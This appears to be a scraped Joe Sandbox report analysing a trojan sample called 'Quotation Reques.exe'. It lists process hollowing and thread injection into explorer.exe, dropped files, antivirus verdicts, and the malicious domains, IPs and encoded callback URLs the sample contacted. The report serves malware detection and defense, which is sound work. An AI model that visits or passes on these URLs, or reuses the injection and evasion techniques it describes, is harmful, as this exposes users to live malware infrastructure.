          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing13/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356530 Sample: Quotation Reques.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 41 www.thedesailldada.com 2->41 43 www.buildermarketingprogram.com 2->43 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 14 other signatures 2->57 11 Quotation Reques.exe 7 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\Roaming\ftkqUsB.exe, PE32 11->33 dropped 35 C:\Users\user\...\ftkqUsB.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\Local\...\tmp1923.tmp, XML 11->37 dropped 39 C:\Users\user\...\Quotation Reques.exe.log, ASCII 11->39 dropped 67 Injects a PE file into a foreign processes 11->67 15 Quotation Reques.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 Queues an APC in another process (thread injection) 15->75 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 45 www.trainingkanban.com 51.83.43.226, 49741, 80 OVHFR France 20->45 47 www.dorteklarskov.com 194.9.94.85, 49743, 80 LOOPIASE Sweden 20->47 49 13 other IPs or domains 20->49 59 System process connects to network (likely due to code injection or exploit) 20->59 26 cmd.exe 20->26         started        signatures11 process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 26->61 63 Maps a DLL or memory area into another process 26->63 65 Tries to detect virtualization through RDTSC time measurements 26->65 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Quotation Reques.exe26%VirustotalBrowse
          Quotation Reques.exe34%ReversingLabsByteCode-MSIL.Trojan.Wacatac
          Quotation Reques.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\ftkqUsB.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\ftkqUsB.exe34%ReversingLabsByteCode-MSIL.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.Quotation Reques.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.gurumanindustries.com/0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf00%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sphenecouture.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.ficuswildlife.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us0%Avira URL Cloudsafe
          http://www.mojavewellnessaz.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T10%Avira URL Cloudsafe
          http://www.dorteklarskov.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA00%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.valiantbranch.com/0wdn/0%Avira URL Cloudsafe
          http://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thisisauckland.com
          		77.72.1.202
          		truetrue
            		unknown
            www.buildermarketingprogram.com
            		208.97.149.17
            		truefalse
              		unknown
              sphenecouture.com
              		160.153.133.87
              		truetrue
                		unknown
                www.trainingkanban.com
                		51.83.43.226
                		truetrue
                  		unknown
                  www.ficuswildlife.com
                  		138.197.103.178
                  		truetrue
                    		unknown
                    www.dorteklarskov.com
                    		194.9.94.85
                    		truetrue
                      		unknown
                      gurumanindustries.com
                      		194.59.164.34
                      		truetrue
                        		unknown
                        mojavewellnessaz.com
                        		107.180.46.143
                        		truetrue
                          		unknown
                          www.vanjele.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.mojavewellnessaz.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.sphenecouture.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.diabetessurgeryturkey.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.xlkefu2.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.thisisauckland.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.gurumanindustries.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.topkids.asia
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.thedesailldada.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.gurumanindustries.com/0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sphenecouture.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIttrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ficuswildlife.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Ustrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mojavewellnessaz.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.dorteklarskov.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            www.valiantbranch.com/0wdn/true
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0true
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.fontbureau.com/designersGQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers/?Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/bTheQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers?Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.tiro.comexplorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                    		high
                                                    https://static.loopia.se/responsive/images/footer/logo-grey.pngcmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssQuotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingcmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.sajatypeworks.comQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.typography.netDQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cn/cTheQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://fontfabrik.comQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwecmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwcmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.galapagosdesign.com/DPleaseQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fonts.comQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.sandoll.co.krQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.urwpp.deDPleaseQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.zhongyicts.com.cnQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://static.loopia.se/responsive/images/extra_pages/website.svgcmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sakkal.comQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.apache.org/licenses/LICENSE-2.0Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.comQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.csscmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.carterandcone.comlQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.fontbureau.com/designers/cabarga.htmlNQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.founder.com.cn/cnQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.fontbureau.com/designers/frere-jones.htmlQuotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.jiyu-kobo.co.jp/Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.com/designers8Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkincmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebcmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpfalse
                                                                                              		high

                                                                                              Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              194.9.94.85
                                                                                              		unknownSweden
                                                                                              		39570LOOPIASEtrue
                                                                                              77.72.1.202
                                                                                              		unknownUnited Kingdom
                                                                                              		12488KRYSTALGRtrue
                                                                                              160.153.133.87
                                                                                              		unknownUnited States
                                                                                              		21501GODADDY-AMSDEtrue
                                                                                              51.83.43.226
                                                                                              		unknownFrance
                                                                                              		16276OVHFRtrue
                                                                                              194.59.164.34
                                                                                              		unknownGermany
                                                                                              		47583AS-HOSTINGERLTtrue
                                                                                              138.197.103.178
                                                                                              		unknownUnited States
                                                                                              		14061DIGITALOCEAN-ASNUStrue
                                                                                              107.180.46.143
                                                                                              		unknownUnited States
                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                                              General Information

                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                              Analysis ID:356530
                                                                                              Start date:23.02.2021
                                                                                              Start time:09:37:21
                                                                                              Joe Sandbox Product:CloudBasic
                                                                                              Overall analysis duration:0h 11m 29s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:light
                                                                                              Sample file name:Quotation Reques.exe
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                              Number of analysed new started processes analysed:30
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:1
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • HDC enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.evad.winEXE@10/4@14/7
                                                                                              EGA Information:Failed
                                                                                              HDC Information:
                                                                                              • Successful, ratio: 5.2% (good quality ratio 4.8%)
                                                                                              • Quality average: 69.5%
                                                                                              • Quality standard deviation: 29.7%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 95%
                                                                                              • Number of executed functions: 0
                                                                                              • Number of non-executed functions: 0
                                                                                              Cookbook Comments:
                                                                                              • Adjust boot time
                                                                                              • Enable AMSI
                                                                                              • Found application associated with file extension: .exe
                                                                                              Warnings:
                                                                                              Show All
                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.193.48, 51.103.5.186, 51.104.139.180, 104.42.151.234, 92.122.145.220, 13.64.90.137, 52.255.188.83, 184.30.20.56, 93.184.221.240, 84.53.167.113, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                                                                              • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, wildcard.weather.microsoft.com.edgekey.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              09:38:18API Interceptor1x Sleep call for process: Quotation Reques.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              194.9.94.85ChTY1xID7P.exeGet hashmaliciousBrowse
                                                                                              • www.probysweden.com/8rg4/?Rl7=XPv4nRgx&GFNP=8pcdT7K99SvBQHTN+kjNsXfvUIHRUDFhxAeFzgkHCKQVnHSzPx8Ea4QrQgUoryMED7RU
                                                                                              W08347.exeGet hashmaliciousBrowse
                                                                                              • www.dorteklarskov.com/0wdn/?J2JxbP=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapXhuVOlkSupz&BXLtz=E0GDCV7XwLQ
                                                                                              SWIFT USD 354,883.00.exeGet hashmaliciousBrowse
                                                                                              • www.snoozefest.online/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=inDXmCoEVF959MsR4qZlCH19qTUcVF3lG0+EShDQun1EUEu815VAvl2FbkxM0G42/NXi
                                                                                              SKM_C3350191107102300.exeGet hashmaliciousBrowse
                                                                                              • www.markenvandrerhjem.com/x2ee/?pPc=jtk0Cpl66flEdmtCCJ0ooXo12vEeYTLWsb93X6dmRn/uvFp2MWw7u7nXNBsvWHmLQYfJ&1bS=WXrtCRKPa
                                                                                              dhlShipment Document BL,INV and Packing List Attached.exeGet hashmaliciousBrowse
                                                                                              • www.xn--abonnemangshjlpen-2qb.com/bw43/
                                                                                              19Payslip_PDF.exeGet hashmaliciousBrowse
                                                                                              • www.narvikfjelletbooking.com/m1/
                                                                                              20Payment confirmation.exeGet hashmaliciousBrowse
                                                                                              • www.ecosnus.com/je/
                                                                                              L7QK2rAwZ9.docGet hashmaliciousBrowse
                                                                                              • www.frolundatandlakarna.com/sree/premium/?id=x9WAXH6klaRMFy6O3HZ8WwcmdK9M7QMpZc3ICl80vZnUl7CgvcSQRnWTS94Br8jxamIB2jL3/pd9c7Kj6+bsRA==
                                                                                              38PO172011.exeGet hashmaliciousBrowse
                                                                                              • www.konsulttjanst.com/br/?id=hqBjOrDlf6AwvR9BonInjJJmaMaNMF-QwMZAWdLxXzuDzmGQwkY8LFj1BsF8oA_GI4QP_WpyHrf6inbK
                                                                                              MX-M452N_20190403_180650.exeGet hashmaliciousBrowse
                                                                                              • www.connectionvbv.com/la/
                                                                                              77.72.1.202TN22020000560175.exeGet hashmaliciousBrowse
                                                                                              • www.thisisauckland.com/0wdn/?MR4ta=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&Vnt4B=-Zd0izgp5Bkt8FY
                                                                                              160.153.133.87order no. 43453.exeGet hashmaliciousBrowse
                                                                                              • www.sphenecouture.com/0wdn/?xPJXwJsp=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9DeHOjFlv0pq&1bw=L6A4n6n0CLA064Qp
